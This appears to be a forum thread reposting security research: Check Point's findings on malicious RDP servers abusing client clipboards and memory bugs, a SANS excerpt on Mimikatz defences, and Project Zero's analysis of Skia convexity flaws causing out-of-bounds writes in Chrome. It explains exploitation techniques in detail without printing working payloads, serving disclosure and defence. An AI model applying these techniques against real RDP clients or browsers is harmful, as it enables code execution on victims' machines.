Scenario #2: A malicious RDP server can modify any clipboard content used by the client, even if the client does not issue a "copy" operation inside the RDP window. If you click "paste" when an RDP connection is open, you are vulnerable to this kind of attack. For example, if you copy a file on your computer, the server can modify your (executable?) file / piggyback on your copy to add additional files / path-traversal files using the previously shown PoC.

We were able to successfully test this attack scenario using NCC's .NET deserialization PoC: the server executes their PoC and places in the clipboard a .NET payload that will pop a calculator (using the "System.String" format). When the client clicks "paste" inside the PowerShell program, the deserialization occurs and a calc is popped.

Note: The content of the synced clipboard is subject to Delayed Rendering.
This means that the clipboard's content is sent over the RDP connection only after a program actively asks for it, usually by clicking "paste". Until then, the clipboard only holds the list of formats that are available, without holding the content itself.

Disclosure Timeline

- 16 October 2018 – Vulnerability was disclosed to Microsoft.
- 22 October 2018 – Vulnerabilities were disclosed to FreeRDP.
- 22 October 2018 – FreeRDP replied and started working on a patch.
- 28 October 2018 – Vulnerabilities were disclosed to rdesktop.
- 5 November 2018 – FreeRDP sent us the patches and asked us to verify them.
- 18 November 2018 – We verified the patches of FreeRDP, and gave them a "green light" to continue.
- 20 November 2018 – FreeRDP committed the patches to their GitHub as part of 2.0.0-rc4.
- 17 December 2018 – Microsoft acknowledged our findings. For more information, see Microsoft's Response.
- 19 December 2018 – rdesktop sent us the patches and asked us to verify them.
- 19 December 2018 – We verified the patches of rdesktop, and gave them a "green light" to continue.
- 16 January 2019 – rdesktop committed the patches to their GitHub as part of v1.8.4.

Microsoft's Response

During the responsible disclosure process, we sent the details of the path traversal in mstsc.exe to Microsoft. This is Microsoft's official response: "Thank you for your submission. We determined your finding is valid but does not meet our bar for servicing. For more information, please see the Microsoft Security Servicing Criteria for Windows (https://aka.ms/windowscriteria)."

As a result, this path traversal has no CVE-ID, and there is no patch to address it.

Conclusion

During our research, we found numerous critical vulnerabilities in the tested RDP clients. Although the code quality of the different clients varies, as can be seen in the distribution of the vulnerabilities we found, we argue that the remote desktop protocol is complicated and prone to vulnerabilities. As we demonstrated in our PoCs for both Microsoft's client and one of the open-source clients, a malicious RDP server can leverage the vulnerabilities in the RDP clients to achieve remote code execution on the client's computer. As RDP is regularly used by IT staff and technical workers to connect to remote computers, we highly recommend that everyone patch their RDP clients. In addition, due to the nature of the clipboard findings we showed in Microsoft's RDP client, we recommend that users disable the clipboard sharing channel (on by default) when connecting to a remote machine.

Recommendation for Protection

Check Point recommends the following steps in order to protect against this attack:

- Check Point Research worked closely with FreeRDP, rdesktop and Microsoft to mitigate these vulnerabilities. If you are using rdesktop or FreeRDP, update to the latest version, which includes the relevant patches.
- When using Microsoft's RDP client (MSTSC), we strongly recommend disabling bi-directional clipboard sharing over RDP.
- Apply security measures to both the clients and the servers involved in the RDP communication. Check Point provides various security layers that may be used for protection, such as IPS, SandBlast Agent, Threat Emulation and ANTEX.
- Users should avoid using RDP to connect to remote servers that have not implemented sufficient security measures.
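For RDP client developers, the core lesson of the clipboard path traversal above is to validate every file name received in the FileGroupDescriptor before writing anything to disk. A minimal sketch of such a check (our illustration, not Microsoft's or Check Point's code):

    #include <string>

    // Reject any received file name that is absolute or contains a ".."
    // path component, so it cannot escape the intended drop directory.
    bool is_safe_fgd_name(const std::string& name) {
        if (name.empty() || name[0] == '\\' || name[0] == '/')
            return false;                          // absolute path
        if (name.size() > 1 && name[1] == ':')
            return false;                          // drive path, e.g. "C:..."
        for (size_t pos = 0;
             (pos = name.find("..", pos)) != std::string::npos; ++pos) {
            // ".." only counts as a traversal when it is a whole component.
            bool starts_component = (pos == 0) ||
                name[pos - 1] == '\\' || name[pos - 1] == '/';
            size_t end = pos + 2;
            bool ends_component = (end == name.size()) ||
                name[end] == '\\' || name[end] == '/';
            if (starts_component && ends_component)
                return false;
        }
        return true;
    }

Anything that fails such a check should be dropped (or reduced to its base name) before the file is ever written.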
Check Point's IPS blade provides protections against these threats: "FreeRDP Remote Code Execution (CVE-2018-8786)".

Appendix A – CVEs found in rdesktop:

- CVE 2018-8791: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function rdpdr_process() that results in an information leak.
- CVE 2018-8792: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function cssp_read_tsrequest() that results in a Denial of Service (segfault).
- CVE 2018-8793: rdesktop versions up to and including v1.8.3 contain a Heap-Based Buffer Overflow in function cssp_read_tsrequest() that results in a memory corruption and probably even a remote code execution.
- CVE 2018-8794: rdesktop versions up to and including v1.8.3 contain an Integer Overflow that leads to an Out-Of-Bounds Write in function process_bitmap_updates() and results in a memory corruption and possibly even a remote code execution.
- CVE 2018-8795: rdesktop versions up to and including v1.8.3 contain an Integer Overflow that leads to a Heap-Based Buffer Overflow in function process_bitmap_updates() and results in a memory corruption and probably even a remote code execution.
- CVE 2018-8796: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function process_bitmap_updates() that results in a Denial of Service (segfault).
- CVE 2018-8797: rdesktop versions up to and including v1.8.3 contain a Heap-Based Buffer Overflow in function process_plane() that results in a memory corruption and probably even a remote code execution.
- CVE 2018-8798: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function rdpsnd_process_ping() that results in an information leak.
- CVE 2018-8799: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function process_secondary_order() that results in a Denial of Service (segfault).
- CVE 2018-8800: rdesktop versions up to and including v1.8.3 contain a Heap-Based Buffer Overflow in function ui_clip_handle_data() that results in a memory corruption and probably even a remote code execution.
- CVE 2018-20174: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function ui_clip_handle_data() that results in an information leak.
- CVE 2018-20175: rdesktop versions up to and including v1.8.3 contain several Integer Signedness errors that lead to Out-Of-Bounds Reads in file mcs.c and result in a Denial of Service (segfault).
- CVE 2018-20176: rdesktop versions up to and including v1.8.3 contain several Out-Of-Bounds Reads in file secure.c that result in a Denial of Service (segfault).
- CVE 2018-20177: rdesktop versions up to and including v1.8.3 contain an Integer Overflow that leads to a Heap-Based Buffer Overflow in function rdp_in_unistr() and results in a memory corruption and possibly even a remote code execution.
- CVE 2018-20178: rdesktop versions up to and including v1.8.3 contain an Out-Of-Bounds Read in function process_demand_active() that results in a Denial of Service (segfault).
- CVE 2018-20179: rdesktop versions up to and including v1.8.3 contain an Integer Underflow that leads to a Heap-Based Buffer Overflow in function lspci_process() and results in a memory corruption and probably even a remote code execution.
- CVE 2018-20180: rdesktop versions up to and including v1.8.3 contain an Integer Underflow that leads to a Heap-Based Buffer Overflow in function rdpsnddbg_process() and results in a memory corruption and probably even a remote code execution.
- CVE 2018-20181: rdesktop versions up to and including v1.8.3 contain an Integer Underflow that leads to a Heap-Based Buffer Overflow in function seamless_process() and results in a memory corruption and probably even a remote code execution.
- CVE 2018-20182: rdesktop versions up to and including v1.8.3 contain a Buffer Overflow over the global variables in function seamless_process_line() that results in a memory corruption and probably even a remote code execution.

Appendix B – CVEs found in FreeRDP:

- CVE 2018-8784: FreeRDP prior to version 2.0.0-rc4 contains a Heap-Based Buffer Overflow in function zgfx_decompress_segment() that results in a memory corruption and probably even a remote code execution.
- CVE 2018-8785: FreeRDP prior to version 2.0.0-rc4 contains a Heap-Based Buffer Overflow in function zgfx_decompress() that results in a memory corruption and probably even a remote code execution.
- CVE 2018-8786: FreeRDP prior to version 2.0.0-rc4 contains an Integer Truncation that leads to a Heap-Based Buffer Overflow in function update_read_bitmap_update() and results in a memory corruption and probably even a remote code execution.
- CVE 2018-8787: FreeRDP prior to version 2.0.0-rc4 contains an Integer Overflow that leads to a Heap-Based Buffer Overflow in function gdi_Bitmap_Decompress() and results in a memory corruption and probably even a remote code execution.
- CVE 2018-8788: FreeRDP prior to version 2.0.0-rc4 contains an Out-Of-Bounds Write of up to 4 bytes in function nsc_rle_decode() that results in a memory corruption and possibly even a remote code execution.
- CVE 2018-8789: FreeRDP prior to version 2.0.0-rc4 contains several Out-Of-Bounds Reads in the NTLM Authentication module that result in a Denial of Service (segfault).

Sursa: https://research.checkpoint.com/reverse-rdp-attack-code-execution-on-rdp-clients/
  24. Mitigations against Mimikatz Style Attacks

Published: 2019-02-05. Last Updated: 2019-02-05 15:26:32 UTC

by Rob VandenBrink (Version: 1)

If you are like me, at some point in most penetration tests you'll have a session on a Windows host, and you'll have an opportunity to dump Windows credentials from that host, usually using Mimikatz. Mimikatz parses credentials (either clear-text or hashes) out of the LSASS process – or at least that's where it started; since its original version back in the day, it has expanded to cover several different attack vectors. An attacker can then use these credentials to "pivot" and attack other resources in the network. This is commonly called "lateral movement", though in many cases you're actually walking "up the tree" to ever-more-valuable targets in the infrastructure.

The defender / blue-teamer (or the blue team's manager) will often say "this sounds like malware, isn't that what Antivirus is for?". Sadly, this is only half right – malware does use this style of attack. The Emotet strain of malware, for instance, does exactly this: once it gains credentials and persistence, it often passes control to other malware (such as TrickBot or Ryuk). Also sadly, it's been pretty easy to bypass AV on this for some time now – there are a number of well-known bypasses that penetration testers use for the Mimikatz + AV combo, many of them outlined on the BHIS blog: https://www.blackhillsinfosec.com/bypass-anti-virus-run-mimikatz

But what about standard Windows mitigations against Mimikatz? Let's start from the beginning: when Mimikatz first came out, Microsoft patched against that first version of the code with KB2871997 (for Windows 7 era hosts, way back in 2014).

Full article: https://isc.sans.edu/diary/rss/24612
  25. The Curious Case of Convexity Confusion

Tuesday, February 5, 2019

Posted by Ivan Fratric, Google Project Zero

Intro

Some time ago, I noticed a tweet about an externally reported vulnerability in the Skia graphics library (used by Chrome, Firefox and Android, among others). The vulnerability caught my attention for several reasons:

- Firstly, I had looked at Skia before in the context of finding precision issues, and any bugs in code I already looked at instantly evoke the "What did I miss?" question in my head.
- Secondly, the bug was described as a stack-based buffer overflow, and you don't see many bugs of this type anymore, especially in web browsers.
- Finally, while the bug itself was found by fuzzing and didn't contain much in the way of root cause analysis, part of the fix involved changing the floating point precision from single to double, which is something I argued against in the previous blog post on precision issues in graphics libraries.

So I wondered what the root cause was and whether the patch really addressed it, or whether other variants could be found. As it turned out, there were indeed other variants, resulting in stack and heap out-of-bounds writes in the Chrome renderer.

Geometry for exploit writers

To understand what the issue was, let's quickly cover some geometry basics we'll need later. This is all pretty basic stuff, so if you already know some geometry, feel free to skip this section.

A convex polygon is a polygon with the following property: you can take any two points inside the polygon, and if you connect them, the resulting line will be entirely contained within the polygon. A concave polygon is a polygon that is not convex. This is illustrated in the following images:

Image 1: An example of a convex polygon
Image 2: An example of a concave polygon

A polygon is monotone with respect to the Y axis (also called y-monotone) if every horizontal line intersects it at most twice. Another way to describe a y-monotone polygon is: if we traverse the points of the polygon from its topmost to its bottommost point (or the other way around), the y coordinates of the points we encounter are always going to decrease (or always increase), but never alternate directions. This is illustrated by the following examples:

Image 3: An example of a y-monotone polygon
Image 4: An example of a non-y-monotone polygon

A polygon can also be x-monotone if every vertical line intersects it at most twice. A convex polygon is both x- and y-monotone, but the inverse is not true: a monotone polygon can be concave, as illustrated in Image 3. All of the concepts above can easily be extended to other curves, not just polygons (which are made entirely of line segments).

A polygon can be transformed by transforming all of its points. A so-called affine transformation is a combination of scaling, skew and translation (note that this also includes rotation, because rotation can be expressed as a combination of scale and skew). Affine transformations have the property that, when used to transform a convex shape, the resulting shape must also be convex. For readers with a basic knowledge of linear algebra: a transformation can be represented in the form of a matrix, and the transformed coordinates can be computed by multiplying the matrix with a vector representing the original coordinates. Transformations can be combined by multiplying matrices.
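To make this concrete (standard notation, not from the original post): in homogeneous coordinates, a 2D affine transformation of a point $(x, y)$ is a single matrix multiplication,

\[
\begin{pmatrix} x' \\ y' \\ 1 \end{pmatrix}
=
\begin{pmatrix}
a & b & t_x \\
c & d & t_y \\
0 & 0 & 1
\end{pmatrix}
\begin{pmatrix} x \\ y \\ 1 \end{pmatrix}
\]

where the upper-left $2 \times 2$ block encodes scale, skew and rotation, and $(t_x, t_y)$ is the translation.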
For example, if you multiply a rotation matrix and a translation matrix, you'll get a transformation matrix that includes both rotation and translation. Depending on the multiplication order, either the rotation or the translation is going to be applied first.

The bug

Back to the bug: after analyzing it, I found out that it was triggered by a malformed RRect (a rectangle with curved corners, where the user can specify a radius for each corner). In this case, tiny values were used as RRect parameters, which caused precision issues when the RRect was converted into a path object (a more general shape representation in Skia, which can consist of both line and curve segments). The result was that, after the RRect was converted to a path and transformed, the resulting shape didn't look like an RRect at all – the resulting shape was concave.

At the same time, Skia assumes that every RRect must be convex, and so, when the RRect is converted to a path, it sets the convexity attribute on the path to kConvex_Convexity (for RRects this happens in the helper class SkAutoPathBoundsUpdate). Why is this a problem? Because Skia has different drawing algorithms, some of which only work for convex paths. And, unfortunately, using algorithms for drawing convex paths when the path is concave can result in memory corruption. This is exactly what happened here.

Skia developers fixed the bug by addressing the RRect-specific computations: they increased the precision of some calculations performed when converting RRects to paths, and also made sure that any RRect corner with a tiny radius would be treated as if the radius were 0. Possibly (I haven't checked), this makes sure that converting an RRect to a path won't result in a concave shape.

However, another detail caught my attention: initially, when the RRect was converted into a path, it might have been concave, but the concavities were so tiny that they wouldn't cause any issues when the path was rendered. At some point the path was transformed, which caused the concavities to become more pronounced (the path was very clearly concave at this point). And yet, the path was still treated as convex. How could that be?

The answer: the transformation used was an affine transform, and Skia respects the mathematical property that transforming a shape with an affine transform cannot change its convexity, so when using an affine transform to transform a path, it copies the convexity attribute to the resulting path object. This means: if we can convince Skia that a path is convex when in reality it is not, and if we apply any affine transform to the path, the resulting path will also be treated as convex. The affine transform can be crafted so that it enlarges, rotates and positions the concavities in such a way that, once the convex drawing algorithm is used on the path, memory corruption issues are triggered. Additionally (untested), it might be possible that, due to precision errors, computing a transformation itself could introduce tiny concavities where there were none previously. These concavities might then be enlarged in subsequent path transformations.

Unfortunately for computational geometry coders everywhere, accurately determining whether a path is convex or not in floating point arithmetic (regardless of whether single or double precision is used) is very difficult, almost impossible. So, how does Skia do it?
Convexity computations in Skia happen in the Convexicator class, where Skia uses several criteria to determine whether a path is convex:

- It traverses the path and computes changes of direction. For example, if we follow a path and always turn left (or always turn right), the path must be convex.
- It checks whether the path is both x- and y-monotone.

When analyzing this Convexicator class, I noticed two cases where a concave path might pass as convex:

- As can be seen here, any pair of points for which the squared distance does not fit in a 32-bit float (i.e. the distance between the points is smaller than ~3.74e-23) will be completely ignored. This, of course, includes sequences of points which form concavities.
- Due to tolerances when computing direction changes (e.g. here and here), even concavities significantly larger than 3.74e-23 can easily pass the convexity check (I experimented with values around 1e-10). However, such concavities must also pass the x- and y-monotonicity check.

Note that, in both cases, a path needs to have some larger edges (for which the direction can be properly computed) in order to be declared convex, so just having a tiny path is not sufficient. Fortunately, a line is considered convex by Skia, so it is sufficient to have a tiny concave shape and a single point at a sufficient distance away from it for a path to be declared convex. Alternatively, by combining both issues above, one can have tiny concavities along a line, which is a technique I used to create paths that are both small and clearly concave when transformed. (Note: the size of the path is often a factor when determining which algorithms can handle which paths.)

To make things clearer, let's see an example of bypassing the convexity check with a polygon that is both x- and y-monotone. Consider the polygon in Image 5 (a), and imagine that the part inside the red circle is much smaller than depicted. Note that this polygon is concave, but it is also both x-monotone and y-monotone. Thus, if the concavity depicted in the red circle is sufficiently small, the polygon is going to be declared convex. Now, let's see what we can do with it by applying an affine transform. Firstly, we can rotate it and make it non-y-monotone, as depicted in Image 5 (b). Having a polygon that is not y-monotone will be very important for triggering memory corruption issues later. Secondly, we can scale (enlarge) and translate the concavity to fill the whole drawing area, and when the concavity is intersected with the drawing area, we'll end up with something like what is depicted in Image 5 (c), where the polygon is clearly concave and the concavity is no longer small.

Image 5 (a), (b), (c): Bypassing the convexity check with a monotone polygon

The walk_convex_edges algorithm

Now that we can bypass the convexity check in various ways, let's see how this can lead to problems. To understand it, let's first examine how Skia's algorithm for drawing (filling) convex paths works (code here). Let's consider the example in Image 6 (a). The first thing Skia does is extract the polygon (path) lines (edges) and sort them according to the coordinates of their topmost point. The sorting order is top-to-bottom and, if two points have the same y coordinate, the one with the smaller x coordinate goes first. This has been done for the polygon in Image 6 (a), and the numbers next to the edges depict their order. The bottommost edge is ignored because it is fully horizontal and thus not needed (you'll see why in a moment).
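The edge ordering just described can be summarized in a small comparator (a sketch of the described ordering, not Skia's actual code):

    #include <algorithm>
    #include <vector>

    // Each edge is keyed by its topmost point; the rest of the edge
    // state (slope, bottom y, ...) is omitted here.
    struct Edge {
        int top_x;
        int top_y;
    };

    // Sort edges top-to-bottom; ties on y are broken left-to-right.
    bool edge_before(const Edge& a, const Edge& b) {
        if (a.top_y != b.top_y)
            return a.top_y < b.top_y;
        return a.top_x < b.top_x;
    }

    // Usage: std::sort(edges.begin(), edges.end(), edge_before);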
Next, the edges are traversed and the area between them is drawn. First, the first two edges (edges 1 and 2) are taken and the area between them is filled from top to bottom – this is the red area in Image 6 (b). After this, edge 1 is "done" and is replaced by the next edge, edge 3. Now the area between edges 2 and 3 is filled (the orange area). Next, edge 2 is "done" and is replaced by the next in line, edge 4. Finally, the area between edges 3 and 4 is rendered. Since there are no more edges, the algorithm stops.

Image 6 (a), (b): Skia convex path filling algorithm

Note that, in the implementation, the code for rendering areas where both edges are vertical (here) is different from the code for rendering areas where at least one edge is at an angle (here). In the first case, the whole area is rendered in a single call to blitter->blitRect(), while in the second case, the area is rendered line by line and blitter->blitH() is called for each line. Of special interest here is the local_top variable, which essentially keeps track of the next y coordinate to fill. In the case of drawing non-vertical edges, it is simply incremented for every line drawn. In the case of vertical lines (drawing a rectangle), after the rectangle is drawn, local_top is set based on the coordinates of the current edge pair. This difference in behavior is going to be useful later.

One interesting observation about this algorithm is that it would work correctly not only for convex paths, but for all paths that are y-monotone. Using it for y-monotone paths would also have another benefit: checking whether a path is y-monotone could be performed faster and more accurately than checking whether a path is convex.

Variant 1

Now, let's see how drawing concave paths using this algorithm can lead to problems. As the first example, consider the polygon in Image 7 (a) with the edge ordering marked.

Image 7 (a), (b): An example of a concave path that causes problems in Skia if rendered as convex

Image 7 (b) shows how the shape is rendered. First, the large red area between edges 1 and 2 is rendered. At this point, both edges 1 and 2 are done, and the orange rectangular area between edges 3 and 4 is rendered next. The purpose of this rectangular area is simply to reset the local_top variable to its correct value (here); otherwise local_top would just continue increasing for every line drawn. Next, the green area between edges 3 and 5 is drawn – and this causes problems. Why? Because Skia expects to always draw pixels in top-to-bottom, left-to-right order, e.g. point (x, y) = (1, 1) is always going to be drawn before (1, 2), and (1, 1) is also always going to be drawn before (2, 1). However, in the example above, the area between edges 1 and 2 will (partially) have the same y values as the area between edges 3 and 5. The second area is going to be drawn, well, second, and yet it contains a subset of the same y coordinates and lower x coordinates than the first region.

Now let's see how this leads to memory corruption. In the original bug, a concave (but presumed convex) path was used as a clipping region (every subsequent draw call draws only inside the clipping region). When setting a path as a clipping region, it also gets "drawn", but instead of drawing pixels on the screen, they just get saved so they can be intersected with whatever gets drawn afterwards.
The pixels are saved in SkRgnBuilder::blitH, and actually, individual pixels aren't saved; instead, an entire range of pixels (from x to x + width at height y) gets stored at once to save space. These ranges – you guessed it – also depend on the correct drawing order, as can be seen here (among other places).

Now let's see what happens when a second path is drawn inside a clipping region with incorrect ordering. If antialiasing is turned on when drawing the second path, SkRgnClipBlitter::blitAntiH gets called for every range drawn. This function needs to intersect the clip region ranges with the range being drawn and only output the pixels that are present in both. For that purpose, it gets the clipping ranges that intersect the line being drawn one by one and processes them. SkRegion::Spanerator::next is used to return the next clipping range.

Let's assume the clipping region for the y coordinate currently being drawn has the ranges [start x, end x] = [10, 20] and [0, 2], and the line being drawn is [15, 16]. Let's also consider the following snippet of code from SkRegion::Spanerator::next:

    if (runs[0] >= fRight) {
        fDone = true;
        return false;
    }

    SkASSERT(runs[1] > fLeft);

    if (left) {
        *left = SkMax32(fLeft, runs[0]);
    }
    if (right) {
        *right = SkMin32(fRight, runs[1]);
    }
    fRuns = runs + 2;
    return true;

where left and right are the output pointers, fLeft and fRight are the left and right x values of the line being drawn (15 and 16 respectively), and runs is a pointer to the clipping region ranges that gets incremented on every iteration.

For the first clipping range [10, 20] this is going to work correctly, but let's see what happens for the range [0, 2]. Firstly, the check

    if (runs[0] >= fRight) {
        fDone = true;
        return false;
    }

is supposed to stop the algorithm, but due to the incorrect range ordering it does not trigger (0 >= 16 is false). Next, left is computed as Max(15, 0) = 15 and right as Min(16, 2) = 2. Note how left is larger than right. This is going to result in calling SkAlphaRuns::Break with a negative count argument on the line

    SkAlphaRuns::Break((int16_t*)runs, (uint8_t*)aa, left - x, right - left);

which then leads to an out-of-bounds write on the following lines in SkAlphaRuns::Break:

    x = count;
    ...
    alpha[x] = alpha[0];

Why did this result in an out-of-bounds write on the stack? Because, in the case of drawing only two pixels, the range arrays passed to SkRgnClipBlitter::blitAntiH and subsequently SkAlphaRuns::Break are allocated on the stack in SkBlitter::blitAntiH2 here.

Triggering the issue in a browser

This is great – we have a stack out-of-bounds write in Skia, but can we trigger it in Chrome? In general, in order to trigger the bug, the following conditions must be met:

- We control a path (SkPath) object.
- Something must be done to the path object that computes its convexity.
- The same path must be transformed and filled / set as a clip region.

My initial idea was to use the CanvasRenderingContext2D API and render a path twice: once without any transform, just to establish its convexity, and a second time with a transformation applied to the CanvasRenderingContext2D object. Unfortunately, this approach won't work: when drawing a path, Skia is going to copy it before applying a transformation, even if there is effectively no transformation set (i.e. the transformation matrix is an identity matrix). So the convexity property is going to be set on a copy of the path, and not on the one we keep a reference to.
Additionally, Chrome itself makes a copy of the path object when calling any canvas function that causes a path to be drawn, and all the other functions we can call with a path object as an argument do not check its convexity. However, I noticed that Chrome canvas still draws my convex/concave paths incorrectly, even if I just draw them once. So what is going on?

As it turns out, when drawing a path using Chrome canvas, the path won't be drawn immediately. Instead, Chrome just records the draw path operation using RecordPaintCanvas, and all such draw operations are executed together at a later time. When a DrawPathOp object (representing a path drawing operation) is created, among other things, it is going to check whether the path is "slow", and one of the criteria for this is path convexity:

    int DrawPathOp::CountSlowPaths() const {
      if (!flags.isAntiAlias() || path.isConvex())
        return 0;
      ...
    }

All of this happens before the path is transformed, so we seemingly have a perfect scenario: we control a path, its convexity is checked, and the same path object later gets transformed and rendered.

The second problem with canvas is that, in the previously described approach to converting the issue into memory corruption, we relied on SkRgnBuilder, which is only used when a clip region has antialiasing turned off, while everything in Chrome canvas is drawn with antialiasing on. Chrome also implements the OffscreenCanvas API, which sets clip antialiasing to off (I'm not sure if this is deliberate or a bug), but OffscreenCanvas does not use RecordPaintCanvas and instead draws everything immediately. So the best way forward seemed to be to find other variants of turning convexity issues into memory corruption, ones that would work with antialiasing on for all operations.

Variant 2

As it happens, Skia implements three different algorithms for path drawing with antialiasing on, and one of these (SkScan::SAAFillPath, using supersampled antialiasing) uses essentially the same filling algorithm we analyzed before. Unfortunately, this does not mean we can get to the same buffer overflow as before – as mentioned above, SkRgnBuilder / SkRgnClipBlitter are not used with antialiasing on. However, we have other options. If we simply fill the path (no clip region needed this time) with the correct algorithm, SuperBlitter::blitH is going to be called without respecting the top-to-bottom, left-to-right drawing order. SuperBlitter::blitH calls SkAlphaRuns::add and, as the last argument, passes the rightmost x coordinate we have drawn so far. This is subtracted from the currently drawn x coordinate on the line

    x -= offsetX;

and if x is smaller than something we already drew (for the same y coordinate), it becomes negative. This is of course exactly what happens when drawing pixels out of Skia's expected order. The result is a call to SkAlphaRuns::Break with a negative "x" argument.
This skips the entire first part of the function (the "while (x > 0)" loop) and continues to the second part:

    runs = next_runs;
    alpha = next_alpha;
    x = count;

    for (;;) {
        int n = runs[0];
        SkASSERT(n > 0);

        if (x < n) {
            alpha[x] = alpha[0];
            runs[0] = SkToS16(x);
            runs[x] = SkToS16(n - x);
            break;
        }
        x -= n;
        if (x <= 0) {
            break;
        }
        runs += n;
        alpha += n;
    }

Here, x gets overwritten with count, but the problem is that runs[0] is not going to be initialized (the first part of the function is supposed to initialize it), so in

    int n = runs[0];

an uninitialized variable gets read into n and used as an offset into arrays, which can result in both an out-of-bounds read and an out-of-bounds write when the following lines are executed:

    runs += n;
    alpha += n;

    alpha[x] = alpha[0];
    runs[0] = SkToS16(x);
    runs[x] = SkToS16(n - x);

The shape needed to trigger this is depicted in Image 8 (a).

Image 8 (a), (b): Shape used to trigger variant 2 in Chrome

This shape is similar to the one previously depicted, but there are some differences, namely:

- We must render two ranges for the same y coordinate immediately one after the other, where the second range is to the left of the first. This is accomplished by making the rectangular area between edges 3 and 4 (orange in Image 8 (b)) less than a pixel wide (so it does not in fact output anything) and making the area between edges 5 and 6 (green in the image) only a single pixel high.
- The second range for the same y must not start at x = 0. This is accomplished by having edge 5 end a bit away from the left side of the image bounds.

This variant can be triggered in Chrome by simply drawing a path – the PoC can be seen here.

Variant 3

An uninitialized variable bug in a browser is nice, but not as nice as a stack out-of-bounds write, so I looked for more variants. For the next and final one, the path we need is a bit more complicated and can be seen in Image 9 (a) (note that the path is self-intersecting).

Image 9 (a), (b): A shape used to trigger a stack buffer overflow in Chrome

Let's see what happens in this one (assume the same drawing algorithm is used as before):

- First, edges 1, 2, 3 and 4 are handled. This part is drawn incorrectly (only the red and orange areas in Image 9 (b) are filled), but the details aren't relevant for triggering the bug. For now, just note that edges 2 and 4 terminate at the same height, so when they are done, they are both replaced with edges 5 and 6.
- The purpose of edges 5 and 6 is once again to reset the local_top variable – it will be set to the height shown as the red dotted line in the image.
- Now, edges 5 and 6 will both get replaced with edges 7 and 8 – and here is the issue: edges 7 and 8 are not going to be drawn only for the y coordinates between the green and blue lines, as they are supposed to be. Instead, they are going to be rendered all the way from the red line to the blue line.

Note the very low steepness of edges 7 and 8: for every line, the x coordinates to draw to are going to be significantly increased and, given that the edges are drawn over a larger number of iterations than intended, the x coordinate will eventually spill past the image bounds. This causes a stack out-of-bounds write if the path is drawn using the SkScan::SAAFillPath algorithm with MaskSuperBlitter. MaskSuperBlitter can only handle very small paths (up to 32x32 pixels) and contains a fixed-size buffer that is filled with an 8-bit opacity value for each pixel of the path region.
Since MaskSuperBlitter is a local variable in SkScan::SAAFillPath, the (fixed-size) buffer is going to be allocated on the stack. When the path above is drawn, there aren't any bounds checks on the opacity buffer (there are only debug asserts, here and here), which leads to an out-of-bounds write on the stack. Specifically (due to how the opacity buffer works), we can increment values on the stack past the end of the buffer by a small amount. This variant is again triggerable in Chrome by simply drawing a path to the canvas, and it gives us a pretty nice primitive for exploitation – note that this is not a linear overflow, and the offsets involved can be controlled by the slope of edges 7 and 8. The PoC can be seen here – most of it is just setting up the path coordinates so that the path is initially declared convex and, at the same time, small enough for MaskSuperBlitter to render it.

How do we make the shape needed to trigger the bug appear convex to Skia while also fitting in 32x32 pixels? Note that the shape is already x-monotone. Now assume we squash it in the y direction until it becomes (almost) a line lying on the x axis. It is still not y-monotone, because there are tiny shifts in the y direction along the line – but if we skew (or rotate) it just a tiny amount, so that it is no longer parallel to the x axis, it also becomes y-monotone. The only parts we can't make monotone are the vertical edges (edges 5 and 6), but if we squash the shape sufficiently, they become so short that their squared length does not fit in a float and they are ignored by the Skia convexity test. This is illustrated in Image 10. In reality, these steps need to be followed in reverse, as we start with a shape that needs to pass the Skia convexity test and then transform it into the shape depicted in Image 9.

Image 10 (a), (b), (c): Making the shape from Image 9 appear convex: (a) the original shape, (b) the shape after y-scale, (c) the shape after y-scale and rotation

On fixing the issue

Initially, Skia developers attempted to fix the issue by not propagating convexity information after a transformation, but only in some cases. Specifically, the convexity was still propagated if the transformation consisted only of scale and translation. Such a fix is insufficient, because very small concavities (where the squared distance between points is too small to fit in a 32-bit float) could still be enlarged using only a scale transformation, and could form shapes that would trigger memory corruption issues. After talking to the Skia developers, a stronger patch was created, modifying the convex drawing algorithm in such a way that passing concave shapes to it won't result in memory corruption, but rather in returning from the draw operation early. This patch shipped, along with other improvements, in Chrome 72.

It isn't uncommon for an initial fix for a vulnerability to be insufficient. But the saving grace for Skia, Chrome and most open-source projects is that the bug reporter can see the fix immediately when it's created and point out its potential drawbacks. Unfortunately, this isn't the case for many closed-source projects, or even open-source projects where the bug-fixing process is opaque to the reporter, which has caused mishaps in the past. However, regardless of the vendor, we at Project Zero are happy to receive information on fixes early and comment on them before they are released to the public.

Conclusion

There are several things worth highlighting about this bug. Firstly, computational geometry is hard. Seriously.
I have some experience with it and, while I can't say I'm an expert, I know that much at least. Handling all the special cases correctly is a pain, even without considering security issues. And doing it using floating point arithmetic might as well be impossible. If I were writing a graphics library, I would convert floats to fixed-point precision as soon as possible, and I wouldn't trust anything computed based on floating-point arithmetic at all.

Secondly, the issue highlights the importance of doing variant analysis: I discovered it based on a public bug report, and other people could have done the same.

Thirdly, it highlights the importance of defense in depth. The latest patch makes sure that drawing a concave path with convex path algorithms won't result in memory corruption, which also addresses unknown variants of convexity issues. If this had been implemented immediately after the initial report, Project Zero would now have one blog post fewer.

Posted by Ben at 10:08 AM

Sursa: https://googleprojectzero.blogspot.com/2019/02/the-curious-case-of-convexity-confusion.html